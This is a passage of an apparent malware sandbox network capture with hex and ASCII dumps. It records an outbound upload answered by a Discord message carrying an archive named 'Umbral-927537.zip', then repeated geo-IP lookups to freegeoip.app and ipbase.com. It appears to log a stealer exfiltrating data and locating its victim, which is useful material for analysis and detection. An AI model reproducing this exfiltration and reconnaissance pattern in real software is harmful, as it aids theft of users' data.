                                      2024-09-06 23:47:51 UTC16355OUTData Raw: 9b 03 ec ca c7 ad 0a 8f 04 79 a7 7d 4f 09 c2 81 71 5c d2 3c ff 2d 25 4c 0a 05 6e 25 02 a8 33 30 32 0f 06 46 fe 0c c5 fc 1a 6e df 0d c2 71 98 d1 db 03 1e 28 11 4f ac 0b fa 17 79 b1 a5 9e 2b f5 4c 70 b8 fe 70 fe e2 b5 b8 cb eb c5 3a 77 83 6e 89 e5 4d a0 84 1f c5 f9 e2 04 a5 f7 8f 9a 2f bb b7 7d 2a cb b6 70 1c 70 45 ae 98 95 ca 82 c2 19 1c 74 d8 63 d3 85 e9 9b d4 29 e2 53 03 62 42 c0 af f1 95 37 b2 d5 e7 f0 fb 2a 79 81 35 8a d5 59 a7 17 3b 0f 91 fe f8 f3 06 89 a5 43 3c 3a 94 4d e9 5d 41 bf 47 a5 4a 2c e2 cb 63 e4 77 aa 0e 23 c2 03 4d 27 9f f7 e2 c1 31 2e 83 22 48 a2 12 60 2e 18 f4 48 45 55 59 38 00 07 e4 4e 5e 11 d4 2b 60 1c 0b d1 7e ec 02 f9 1b 22 0a 4a 8e b5 39 d8 5b ad e6 74 ef 04 fd 0a 98 e1 50 e2 a2 2e 2f 27 18 88 db 92 07 c9 0d 85 09 5e 19 2a 46 d8 0f
                                      Data Ascii: y}Oq\<-%Ln%302Fnq(Oy+Lpp:wnM/}*ppEtc)SbB7*y5Y;C<:M]AGJ,cw#M'1."H`.HEUY8N^+`~"J9[tP./'^*F
                                      2024-09-06 23:47:51 UTC1369INHTTP/1.1 200 OK
                                      Date: Fri, 06 Sep 2024 23:47:51 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                      x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                      x-ratelimit-limit: 5
                                      x-ratelimit-remaining: 4
                                      x-ratelimit-reset: 1725666472
                                      x-ratelimit-reset-after: 1
                                      vary: Accept-Encoding
                                      via: 1.1 google
                                      alt-svc: h3=":443"; ma=86400
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XPbGVaWH1N%2BzWLqHFKQi9OgzYtLs%2BDLWR828Vpw3UPlELLVXhyPxOq%2FCEEioGOsy1c5UBfAq5%2FJJQ1C5aVsg4PUrwPQ9H%2BnLvU23HivCETRzCJzTMvI4whgB367m"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      X-Content-Type-Options: nosniff
                                      Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                      Server: cloudflare
                                      CF-RAY: 8bf258b3d8734251-EWR
                                      40b
                                      {"type":0,"content":"","mentions":[],"mention_roles":[],"attachments":[{"id":"1281762825542303845","filename":"Umbral-927537.zip","size":454652,"url":"https://cdn.discordapp.com/attachments/1277266726186385433/1281762825542303845/Umbral-927537.zip?ex=66dce627&is=66db94a7&hm=6da8e35b58c226818205212d93fc7cf4a7c84508c067ccc0ecb5379ccf9b76a3&","proxy_url":"https://media.discordapp.net/attachments/1277266726186385433/128176282554


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20192.168.2.549739188.114.97.3443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:47:52 UTC67OUTGET /xml/ HTTP/1.1
                                      Host: freegeoip.app
                                      Connection: Keep-Alive
                                      2024-09-06 23:47:52 UTC645INHTTP/1.1 301 Moved Permanently
                                      Date: Fri, 06 Sep 2024 23:47:52 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Sat, 07 Sep 2024 00:47:52 GMT
                                      Location: https://ipbase.com/xml/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QOGvgZorAqqysZJmI44c6exIq69Nid7RoudCI%2FEBj8QU4QkZY%2Fsf2Njkt0gr%2FSL5tzfzbtokDT6SfzgSGh1m%2Fg7BSvu46ngUGTM3lt%2BY2MMj5%2BzLoutJ1nDDBts5FURc"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf258bfdf7d0f84-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:47:52 UTC167INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21192.168.2.549742104.21.85.189443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:47:53 UTC64OUTGET /xml/ HTTP/1.1
                                      Host: ipbase.com
                                      Connection: Keep-Alive
                                      2024-09-06 23:47:53 UTC733INHTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 23:47:53 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Age: 27380
                                      Cache-Control: public,max-age=0,must-revalidate
                                      Cache-Status: "Netlify Edge"; hit
                                      Vary: Accept-Encoding
                                      X-Nf-Request-Id: 01J74VSDK8VBW36FGQW2WATK2B
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6srdPrqol7Q3hUrVBUb8IH9mBB9V2pFA131CJRyn9XtL3hzB3YsmBpqvc%2Fe9y4JRI48QI8gXPICVdasgKiAcpDzKA5lrC9Gr2DcX7BDIcm24lVPcpXC1%2Bm5rMWPb"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf258c3bce48ce0-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:47:53 UTC636INData Raw: 63 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d
                                      Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
                                      2024-09-06 23:47:53 UTC1369INData Raw: 30 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 6d 61 69 6e 20 7b 0a 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30
                                      Data Ascii: 0; } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; height: 100
                                      2024-09-06 23:47:53 UTC1084INData Raw: 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 30 30 37 30 36 37 22 20 64 3d 22 4d 31 31 2e 39 39 39 38 38 33 36 2c 34 2e 30 39 33 37 30 38 30 33 20 4c 38 2e 35 35 38 30 39 35 31 37 2c 37 2e 34 33 32 39 34 39 35 33 20 43 38 2e 32 33 35 33 31 34 35 39 2c 37 2e 37 34 36 31 31 32 39 38 20 38 2e 32 33 35 33 31 34 35 39 2c 38 2e 32 35 33 38 38 37 33 36 20 38 2e 35 35 38 30 39 35 31 37 2c 38 2e 35 36 36 39 33 37 36 39 20 4c 31 32 2c 31 31 2e 39 30 36 32 39 32 31 20 4c 39 2e 38 34 31 38 37 38 37 31 2c 31 34 20 4c 34 2e 32 34 32 30 38 35 34 34 2c 38 2e 35 36 36 39 33 37 35 31 20 43 33 2e 39 31 39 33 30 34 38 35 2c 38 2e 32 35 33 38 38 37 31 39 20 33 2e 39 31 39 33 30 34 38 35 2c 37 2e 37 34 36 31 31 32 38 31 20 34 2e 32 34 32 30 38 35 34 34 2c 37 2e 34 33 32 39 34 39 33
                                      Data Ascii: <path fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7.4329493
                                      2024-09-06 23:47:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22192.168.2.549748188.114.97.3443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:47:57 UTC67OUTGET /xml/ HTTP/1.1
                                      Host: freegeoip.app
                                      Connection: Keep-Alive
                                      2024-09-06 23:47:57 UTC639INHTTP/1.1 301 Moved Permanently
                                      Date: Fri, 06 Sep 2024 23:47:57 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Sat, 07 Sep 2024 00:47:57 GMT
                                      Location: https://ipbase.com/xml/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BeR82bMoITR6A4t7cvKhBnt6QDKArwwIiseoCgdao0Ks%2Fh8IB38HeY0ww1Xc7IZFYSXlnN4PANCOGvNRNeI7tFNVvKfWAShRP%2BHbPKydWRrgH6XCIpzikyS63Wxuw%2B3G"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf258dcbdf9189d-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:47:57 UTC167INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23192.168.2.549749104.21.85.189443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:47:58 UTC64OUTGET /xml/ HTTP/1.1
                                      Host: ipbase.com
                                      Connection: Keep-Alive
                                      2024-09-06 23:47:58 UTC735INHTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 23:47:58 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Age: 19232
                                      Cache-Control: public,max-age=0,must-revalidate
                                      Cache-Status: "Netlify Edge"; hit
                                      Vary: Accept-Encoding
                                      X-Nf-Request-Id: 01J74VSJ4EH95V1KZHVGFJD469
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VOHCsR%2BB38YszEFOwXKdKvNSIpf9pLAaZf%2Fw3J0Sjt0k26ka2yw90BHa98GJ53GJMgv5RzZ%2FcV0O6t4XAQAohSXBUPJfgpVIKyhlqJzsCEzkWHQRLi4C2Yc9Hl6d"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf258e0bfb1728f-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:47:58 UTC634INData Raw: 63 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d
                                      Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
                                      2024-09-06 23:47:58 UTC1369INData Raw: 3a 20 30 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 6d 61 69 6e 20 7b 0a 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31
                                      Data Ascii: : 0; } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; height: 1
                                      2024-09-06 23:47:58 UTC1086INData Raw: 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 30 30 37 30 36 37 22 20 64 3d 22 4d 31 31 2e 39 39 39 38 38 33 36 2c 34 2e 30 39 33 37 30 38 30 33 20 4c 38 2e 35 35 38 30 39 35 31 37 2c 37 2e 34 33 32 39 34 39 35 33 20 43 38 2e 32 33 35 33 31 34 35 39 2c 37 2e 37 34 36 31 31 32 39 38 20 38 2e 32 33 35 33 31 34 35 39 2c 38 2e 32 35 33 38 38 37 33 36 20 38 2e 35 35 38 30 39 35 31 37 2c 38 2e 35 36 36 39 33 37 36 39 20 4c 31 32 2c 31 31 2e 39 30 36 32 39 32 31 20 4c 39 2e 38 34 31 38 37 38 37 31 2c 31 34 20 4c 34 2e 32 34 32 30 38 35 34 34 2c 38 2e 35 36 36 39 33 37 35 31 20 43 33 2e 39 31 39 33 30 34 38 35 2c 38 2e 32 35 33 38 38 37 31 39 20 33 2e 39 31 39 33 30 34 38 35 2c 37 2e 37 34 36 31 31 32 38 31 20 34 2e 32 34 32 30 38 35 34 34 2c 37 2e 34 33 32 39 34
                                      Data Ascii: <path fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7.43294
                                      2024-09-06 23:47:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24192.168.2.549750188.114.97.3443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:48:00 UTC67OUTGET /xml/ HTTP/1.1
                                      Host: freegeoip.app
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:00 UTC639INHTTP/1.1 301 Moved Permanently
                                      Date: Fri, 06 Sep 2024 23:48:00 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Sat, 07 Sep 2024 00:48:00 GMT
                                      Location: https://ipbase.com/xml/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Yi7xCTu6Tj75MuL6zB8ZFBy0GPW5e62uIUlmbQH%2BcMX7vCbN%2BTwJt4Saa8NQ7pKtkPitnQw0nOMT1ByutEAGT9Im9ucMY0CKBlE9ulgo7Jq3%2BtuUhETT7onJCEX1am33"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf258efa91a424d-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:00 UTC167INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      25192.168.2.549751104.21.85.189443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:48:01 UTC64OUTGET /xml/ HTTP/1.1
                                      Host: ipbase.com
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:01 UTC735INHTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 23:48:01 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Age: 33336
                                      Cache-Control: public,max-age=0,must-revalidate
                                      Cache-Status: "Netlify Edge"; hit
                                      Vary: Accept-Encoding
                                      X-Nf-Request-Id: 01J74VSN292RR6E3MCGB9XJK82
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KBalkW3sLCGdXhjrVjpACd19ua2xcO8H6KmdVgtGWbhHsEZcCjfWJErr0E5e9Q0rLuDwqtKDl%2FRHIfj%2FlefNQJwfVI9UroLwR4enS%2FrxK8mQOVNF7fMNo3sUYPbe"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf258f379a642b2-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:01 UTC634INData Raw: 63 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d
                                      Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
                                      2024-09-06 23:48:01 UTC1369INData Raw: 3a 20 30 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 6d 61 69 6e 20 7b 0a 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31
                                      Data Ascii: : 0; } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; height: 1
                                      2024-09-06 23:48:01 UTC1086INData Raw: 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 30 30 37 30 36 37 22 20 64 3d 22 4d 31 31 2e 39 39 39 38 38 33 36 2c 34 2e 30 39 33 37 30 38 30 33 20 4c 38 2e 35 35 38 30 39 35 31 37 2c 37 2e 34 33 32 39 34 39 35 33 20 43 38 2e 32 33 35 33 31 34 35 39 2c 37 2e 37 34 36 31 31 32 39 38 20 38 2e 32 33 35 33 31 34 35 39 2c 38 2e 32 35 33 38 38 37 33 36 20 38 2e 35 35 38 30 39 35 31 37 2c 38 2e 35 36 36 39 33 37 36 39 20 4c 31 32 2c 31 31 2e 39 30 36 32 39 32 31 20 4c 39 2e 38 34 31 38 37 38 37 31 2c 31 34 20 4c 34 2e 32 34 32 30 38 35 34 34 2c 38 2e 35 36 36 39 33 37 35 31 20 43 33 2e 39 31 39 33 30 34 38 35 2c 38 2e 32 35 33 38 38 37 31 39 20 33 2e 39 31 39 33 30 34 38 35 2c 37 2e 37 34 36 31 31 32 38 31 20 34 2e 32 34 32 30 38 35 34 34 2c 37 2e 34 33 32 39 34
                                      Data Ascii: <path fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7.43294
                                      2024-09-06 23:48:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      26192.168.2.549754188.114.97.3443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:48:04 UTC67OUTGET /xml/ HTTP/1.1
                                      Host: freegeoip.app
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:04 UTC641INHTTP/1.1 301 Moved Permanently
                                      Date: Fri, 06 Sep 2024 23:48:04 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Sat, 07 Sep 2024 00:48:04 GMT
                                      Location: https://ipbase.com/xml/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m4Bf4en5yPIIu2%2FCVKiFCB1xM%2FSDm8ki6B7CAHoQc61QLhBSgMtUp2RSX%2BdKuIRjbhXJ8yap84FEifiRqymPYELlmSLEMwqVVlwhOom40VpBNfxY3UJZrYY%2FOQcoMAwU"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf25908288b4265-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:04 UTC167INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      27192.168.2.549756104.21.85.189443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:48:05 UTC64OUTGET /xml/ HTTP/1.1
                                      Host: ipbase.com
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:05 UTC734INHTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 23:48:05 GMT
                                      Content-Type: text/html; charset=utf-8
